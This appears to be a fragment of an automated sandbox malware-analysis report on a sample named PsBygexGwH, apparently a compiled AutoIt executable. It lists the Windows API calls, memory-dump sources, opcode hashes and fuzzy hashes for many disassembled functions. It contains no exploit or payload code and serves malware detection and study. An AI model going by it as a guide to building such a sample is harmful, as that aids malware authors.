                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID:
                                                          • API String ID: 1986988660-0
                                                          • Opcode ID: c4a1fc2f56359517c2e0a3dea5e0fef775b10803fc2d5b0779fc84a4ab5dcaad
                                                          • Instruction ID: c6c213cbe265e587cb3b38358948cab2dded59e764341593adee436046cf8148
                                                          • Opcode Fuzzy Hash: c4a1fc2f56359517c2e0a3dea5e0fef775b10803fc2d5b0779fc84a4ab5dcaad
                                                          • Instruction Fuzzy Hash: 3F71CDB4901304FFC784EF7ABE456B53AE1FBAA394754822AD10AD7A71EB314485CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0012556D
                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0012557D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: c81671942bef38bce922fdece6facd3aa07a403df57e772a5c3da66586c31c23
                                                          • Instruction ID: e42d1b9050da7407f68ab8f39bc66775c3b1172ea2c59b4415d35f4508d9ad4f
                                                          • Opcode Fuzzy Hash: c81671942bef38bce922fdece6facd3aa07a403df57e772a5c3da66586c31c23
                                                          • Instruction Fuzzy Hash: A8314C71A00A19FFDB18CF28D880B99B7B6FB48314F158629E91997240D771FEA4CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,001585CC,?,001E8CC8,0000000C), ref: 00158704
                                                          • GetLastError.KERNEL32(?,001585CC,?,001E8CC8,0000000C), ref: 0015870E
                                                          • __dosmaperr.LIBCMT ref: 00158739
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                          • String ID:
                                                          • API String ID: 490808831-0
                                                          • Opcode ID: 472b40cc5e5ff53d2ce3ca168864619f37d0090b9a3b241746a5fd55a1079524
                                                          • Instruction ID: a777ba682a8f85707ddcf601a859e74aee1c448100535a8e458aa63f471c39d5
                                                          • Opcode Fuzzy Hash: 472b40cc5e5ff53d2ce3ca168864619f37d0090b9a3b241746a5fd55a1079524
                                                          • Instruction Fuzzy Hash: 64010832A056209BD7A56234E845B7E674A5B95776F290219FC38AF1E2DFA08C898190
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00192CD4,?,?,?,00000004,00000001), ref: 00192FF2
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00192CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00193006
                                                          • CloseHandle.KERNEL32(00000000,?,00192CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0019300D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: c23c9d80996bc281fc8faac00f1e43ec4835afa43b28aa6df0141f56a496e15f
                                                          • Instruction ID: 2162baac2432c796b90491525e348195787862f877fbd780a89a48444c0dfada
                                                          • Opcode Fuzzy Hash: c23c9d80996bc281fc8faac00f1e43ec4835afa43b28aa6df0141f56a496e15f
                                                          • Instruction Fuzzy Hash: 8CE0863228021077D6302759BC0DF8B3A5CE786B71F104320F769760D047A0154142E8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 001317F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: CALL
                                                          • API String ID: 1385522511-4196123274
                                                          • Opcode ID: c9f217a0e1a3edf56af9ad8b225c61e6d6a9949208d1cf5e1efc2c07184b5e0c
                                                          • Instruction ID: 420476aaf5820d973e75bf53e4716d08efd4944f5d9170e80c04029d95810dc6
                                                          • Opcode Fuzzy Hash: c9f217a0e1a3edf56af9ad8b225c61e6d6a9949208d1cf5e1efc2c07184b5e0c
                                                          • Instruction Fuzzy Hash: 1A228CB0608201EFC718CF14C484B2ABBF1BF99314F19896DF49A8B361D771E955CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00196F6B
                                                            • Part of subcall function 00124ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad_wcslen
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 3312870042-2806939583
                                                          • Opcode ID: a64d04e776506ac6fab49efd356288e0f94466ca891e4f79903130ae1da6d870
                                                          • Instruction ID: 7dcd037e6cf6a530f46ac345216d74ac854492f3456955f67b1dbf7a54d7cecf
                                                          • Opcode Fuzzy Hash: a64d04e776506ac6fab49efd356288e0f94466ca891e4f79903130ae1da6d870
                                                          • Instruction Fuzzy Hash: 40B1A1311183118FCB14EF24E89196EB7E5BFA4304F44896DF496972A2EB30ED59CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00162C8C
                                                            • Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2
                                                            • Part of subcall function 00122DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00122DC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen
                                                          • String ID: X
                                                          • API String ID: 779396738-3081909835
                                                          • Opcode ID: d15cd7f1b4ef741007bdd37fb96595869904a03e4276378b65469c6bdc330f12
                                                          • Instruction ID: 71d727bc740a68a31abf388d72cee53de92a0847cfe906a690affafeade1fa25
                                                          • Opcode Fuzzy Hash: d15cd7f1b4ef741007bdd37fb96595869904a03e4276378b65469c6bdc330f12
                                                          • Instruction Fuzzy Hash: FC21A871A00298AFCB01EF94DC45BEE7BF8AF59314F004059E405F7241DBB85A998FA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock
                                                          • String ID: EA06
                                                          • API String ID: 2638373210-3962188686
                                                          • Opcode ID: f88b77998c0426d60b659630401eddea357ea4658aef434b7b4c301b028908eb
                                                          • Instruction ID: 8fb858dc5848bdbef621b9fecdd0e51a27f02497694aeb22c79c2fc7b67dac73
                                                          • Opcode Fuzzy Hash: f88b77998c0426d60b659630401eddea357ea4658aef434b7b4c301b028908eb
                                                          • Instruction Fuzzy Hash: 4301B5729042587EEF18C7A8C856EEEBBF89B15305F00455EE152D21C1E6B4E6188B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00123908
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_
                                                          • String ID:
                                                          • API String ID: 1144537725-0
                                                          • Opcode ID: 49eb691b9deae74b6a3dfa29a73daf87a3ebb08d9b862085b41491e650defe37
                                                          • Instruction ID: c84aa1d847314f5b594c44cec77ff2a734c633fd12168ce927f27de8c5f0aece
                                                          • Opcode Fuzzy Hash: 49eb691b9deae74b6a3dfa29a73daf87a3ebb08d9b862085b41491e650defe37
                                                          • Instruction Fuzzy Hash: A131B6B0604311DFD720DF24E8847A7BBF4FB49718F00092EF5A987650E775AA94CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0012949C,?,00008000), ref: 00125773
                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0012949C,?,00008000), ref: 00164052
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 00fdda0a667276eb8bfcbaa4972c4ead8235ff1a0255a9cf5800fa044a52e26e
                                                          • Instruction ID: 60e82cdf7003aa9daaffaef6ff7c16bacbbb7ac661ec6f03ef1e6a5133230943
                                                          • Opcode Fuzzy Hash: 00fdda0a667276eb8bfcbaa4972c4ead8235ff1a0255a9cf5800fa044a52e26e
                                                          • Instruction Fuzzy Hash: 92014031185235B6E3355A2ADC4EF977F99EF067B0F158310BA9C6A1E0C7B45864CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0012BB4E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID:
                                                          • API String ID: 1385522511-0
                                                          • Opcode ID: c7485086319cdb4b898f7ca36e5f751d70d6360a94b44da48b6678d5ce7d4aff
                                                          • Instruction ID: 1de57d44325500492db88c4ce0dc559958ba11b37eb7abfb55b225a8e842f7d0
                                                          • Opcode Fuzzy Hash: c7485086319cdb4b898f7ca36e5f751d70d6360a94b44da48b6678d5ce7d4aff
                                                          • Instruction Fuzzy Hash: 1132FDB5A08229DFCF24CF14D894ABEB7B5FF48304F158059E909AB2A1C774ED91CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 023C08E0: GetFileAttributesW.KERNELBASE(?), ref: 023C08EB
                                                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 023C11FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AttributesCreateDirectoryFile
                                                          • String ID:
                                                          • API String ID: 3401506121-0
                                                          • Opcode ID: c1fc141f4cd2bd7326890f44ee376bd40f166218598b0344cf600e312907e652
                                                          • Instruction ID: d3834f5119031a41c2c9e09d8fd8671440007a197b6629eba6f52f7d9bd45e2f
                                                          • Opcode Fuzzy Hash: c1fc141f4cd2bd7326890f44ee376bd40f166218598b0344cf600e312907e652
                                                          • Instruction Fuzzy Hash: 2C518735A1020D96DF24EFB0C954BEF737AEF58300F1045A9A60DE7184EB759B44CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00124E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E9C
                                                            • Part of subcall function 00124E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00124EAE
                                                            • Part of subcall function 00124E90: FreeLibrary.KERNEL32(00000000,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EC0
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EFD
                                                            • Part of subcall function 00124E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E62
                                                            • Part of subcall function 00124E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00124E74
                                                            • Part of subcall function 00124E59: FreeLibrary.KERNEL32(00000000,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E87
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressFreeProc
                                                          • String ID:
                                                          • API String ID: 2632591731-0
                                                          • Opcode ID: bd2d990e3f9011b3b2527b8cb8c90592bbe2bde81d3806965f57bbe62b4b9684
                                                          • Instruction ID: 229dfb0afe6efd1a3b48557f1a1d4097bea06424725af2dc457b70efbca43f2f
                                                          • Opcode Fuzzy Hash: bd2d990e3f9011b3b2527b8cb8c90592bbe2bde81d3806965f57bbe62b4b9684
                                                          • Instruction Fuzzy Hash: 43113A31600225ABDF14FF64FD02FAD77A5AFA0710F10842EF542A61C1EF749E249B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: 39988f64e5a42dab1c174354fed8eb7c1ae9b9df8030a5c3e8bad895953b2a7a
                                                          • Instruction ID: 846d8cff31f59462a3e46bdbcdaed55a35b2dd59e54f2dc5b0b41ec79b4499ba
                                                          • Opcode Fuzzy Hash: 39988f64e5a42dab1c174354fed8eb7c1ae9b9df8030a5c3e8bad895953b2a7a
                                                          • Instruction Fuzzy Hash: 6411487590410AEFCB05DF58E940A9A7BF9EF48304F114059FC19AB312DB30DA25CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0012543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00129A9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: e4ceed1e4dd91c12069b289dac148f9a5ab7a42839ef4bcbaf9e001e730bcfbc
                                                          • Instruction ID: e4bddaf5aed43a07a23b7788f3b8291047b78d27c4e66625408e09266802f64f
                                                          • Opcode Fuzzy Hash: e4ceed1e4dd91c12069b289dac148f9a5ab7a42839ef4bcbaf9e001e730bcfbc
                                                          • Instruction Fuzzy Hash: 2E1148312047159FEB24CF09E881BAAB7F9EF44764F10C42EE99B8BA51C770A955CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00154C7D: RtlAllocateHeap.NTDLL(00000008,00121129,00000000,?,00152E29,00000001,00000364,?,?,?,0014F2DE,00153863,001F1444,?,0013FDF5,?), ref: 00154CBE
                                                          • _free.LIBCMT ref: 0015506C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                          • Instruction ID: 57a22ebdff9d56364f60d3330ca1abfa173d60b10e7285fd230681e84c1db9e9
                                                          • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                          • Instruction Fuzzy Hash: 46012B722047049BE3218E55D84195AFBE9FB85371F25051DF9A49B2C0E7306809C774
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                          • Instruction ID: e7db4f11700876db091733c6f091e6e3ffd063803d151ec1bc14ab07b5a77e71
                                                          • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                          • Instruction Fuzzy Hash: 62F0A432511A14DADB313A79DC05B9A33DCAF72336F120719F835A72E2DB74D8068AA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID:
                                                          • API String ID: 176396367-0
                                                          • Opcode ID: e8927a259a13a384b7f8d17d197a21d4458e0330a19322b0a8ddd77362a479d3
                                                          • Instruction ID: ee16ee1a6850dcf56b23618256d5a2cfbb7210098271c398a4325d927fab3607
                                                          • Opcode Fuzzy Hash: e8927a259a13a384b7f8d17d197a21d4458e0330a19322b0a8ddd77362a479d3
                                                          • Instruction Fuzzy Hash: 82F028B36006006ED7149F29D806B67BB94EF54760F10853EF619CB2D1DB31E420C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
